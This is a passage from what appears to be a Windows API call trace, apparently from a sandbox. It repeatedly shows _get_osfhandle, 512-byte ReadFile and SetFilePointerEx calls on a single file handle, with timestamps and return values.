lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.943] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.943] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.943] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.943] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.943] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.943] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.943] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.943] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.943] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.943] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.944] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.944] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.944] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.944] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.944] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.944] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.944] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.944] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.944] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.944] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.944] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.944] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.944] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.944] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.944] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.944] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.944] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.944] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.944] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.944] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.944] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.944] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.944] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.945] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.945] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.945] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.945] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.945] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.945] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.945] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.945] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.945] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.945] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.945] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.945] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.945] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.945] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.945] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.945] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.945] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.945] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.945] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.945] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.945] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.945] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.946] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.946] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.946] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.946] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.946] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.946] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.946] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.946] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.946] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.946] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.946] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.946] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.946] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.946] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.946] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.946] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.946] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.946] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.946] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.946] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.946] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.946] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.946] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.946] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.947] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.947] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.947] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.947] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.947] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.947] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.947] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.947] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.947] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.947] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.947] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.947] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.947] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.947] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.947] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.947] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.947] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.947] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.947] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.947] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.947] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.947] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.947] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.948] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.948] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.948] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.948] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.948] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.948] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.948] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.948] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.948] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.948] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.948] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.948] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.948] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.948] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.948] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.948] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.948] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.948] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.948] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.948] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.948] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.948] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.948] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.949] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.949] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.949] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.949] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.949] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.949] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.949] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.949] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.949] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.949] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.949] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.949] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.949] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.949] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.949] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.949] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.949] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.949] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.949] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.949] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.949] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.949] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.949] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.950] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.950] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.950] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.950] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.950] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.950] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.950] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.950] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.950] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.950] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.950] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.950] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.950] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.950] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.950] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.950] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.950] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.950] SetFilePointerEx (in: hFile=0x54, 